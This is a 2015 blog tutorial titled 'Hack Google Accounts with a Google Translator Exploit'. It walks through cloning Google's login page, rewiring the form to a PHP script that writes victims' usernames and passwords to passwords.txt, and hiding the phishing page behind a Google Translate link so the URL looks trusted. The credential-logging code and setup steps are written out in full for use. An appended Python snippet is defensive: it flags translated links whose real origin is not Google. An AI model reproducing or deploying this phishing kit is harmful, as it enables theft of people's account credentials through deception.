Tuesday, 19 May 2015

Hack Google Accounts with a Google Translator Exploit




Google is our friend, but like everything else it has its flaws. A little-known flaw within the media giant allows phishing of Google accounts that completely bypasses the advanced web protection programs in users' browsers, as well as other protections that Google has put in place. How does it do this? The domain in the address bar reads as if the page is served by Google itself.
 

Advanced Social Engineering, Part 2: Hack Google Accounts with a Google Translator Exploit


It also plays on human psychology, because the domain appears to be a trusted one that you visit regularly. This kind of phishing lets people steal credentials in plain text, and with this method they likely do so without anyone realizing.

Requirements

  • A web hosting account
  • cPanel access to the web host

 

Step 1 Create a Gmail Phishing Page

First, we need to make a phishing page to prepare.
  1. Open up a text document using notepad, or your choice in text editors.
  2. Go to the Google login page.
  3. Right-click somewhere on the page, and click View page source.
  4. Copy all of the contents of the source code and paste them into your text document.
  5. Hit ctrl + f, and search for "action=" and change the method to "GET", and the text to the right of "action=" to "log.php".
  6. Click File > Save as and save it with the name "index.php" (make sure to click the drop-down menu to select "all files" if it's not selected already).
  7. Make a new text file, and paste the below as the contents (paste the raw text, not the numbered). This is the file written in PHP that logs the victim's login details.
    <?php
    $handle = fopen("passwords.txt", "a");
    foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?> 
  8. Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.
  9. Log in to your hosting account, and upload both files to the root of your website (not in a folder).
  10. When credentials are logged, they will be in a file called "passwords.txt" in the root of your website. Check the box next to the "passwords.txt" file when you get some logs, and click chmod. Change the file to 466 permissions, so other people can't read the victim's passwords.

Step 2 Manipulating Google

How exactly does the manipulation work? Through Google Translator. Google Translator has a vulnerability: if an attacker creates a fake Gmail login page and then translates it with the tool, they get a perfectly crafted link masked by Google itself. Check out this URL for an example of a phishing page that was created and then masked using the translation tool.
This fools users into thinking the page is legit. I mean, look at the URL:










  1. Go to Google Translate.
  2. Translate your page from a different language into English.
  3. Click the link and test.

See how frighteningly easy it is to manipulate a website even as large as Google? Keep safe by always analyzing that URL.
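
One way to automate that URL analysis on the defensive side, as an added example that is not part of the original post: the Python below unwraps translated-page links found in mail or proxy logs and reports the host that actually serves the content. The host list, the use of the `u` query parameter for the wrapped address, the function names and the sample URLs are assumptions made for this illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: hosts that serve Google's translated-page proxy.
TRANSLATE_HOSTS = {"translate.google.com", "translate.googleusercontent.com"}

# Constructed sample URLs, e.g. pulled from mail or web-proxy logs.
SAMPLE_URLS = [
    "https://translate.google.com/translate?sl=auto&tl=en&u=http%3A%2F%2Flogin.example.test%2Findex.php",
    "https://translate.google.com/translate?tl=en&u=login.example.test/index.php",
    "https://translate.google.com/translate?u=https://support.google.com/translate",
    "https://translate.google.com/?sl=fr&tl=en&text=bonjour",
    "https://translate.google.com.example.test/translate?u=http://a.example.test/",
    "https://accounts.google.com/ServiceLogin",
]


def wrapped_origin(url):
    """Host that really serves the content behind a translated-page link,
    or None when `url` is not such a link."""
    parts = urlsplit(url)
    if (parts.hostname or "").lower() not in TRANSLATE_HOSTS:
        return None  # exact host match only; look-alike domains are a separate check
    targets = parse_qs(parts.query).get("u")
    if not targets:
        return None  # plain text translation, no wrapped page
    target = targets[0].strip()
    if "://" not in target:
        target = "http://" + target  # scheme-less value: parse it as host/path
    return (urlsplit(target).hostname or "").lower() or None


def triage(urls, trusted_suffixes=("google.com",)):
    """Return (url, origin) for translated-page links whose wrapped
    origin is outside the trusted domains."""
    findings = []
    for url in urls:
        origin = wrapped_origin(url)
        if origin and not any(
            origin == s or origin.endswith("." + s) for s in trusted_suffixes
        ):
            findings.append((url, origin))
    return findings


if __name__ == "__main__":
    for url, origin in triage(SAMPLE_URLS):
        print(f"content served by {origin}: {url}")
```

A login form reached through any flagged link is being served by the reported origin, not by Google, whatever the address bar shows.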


#!13lackD3M0n
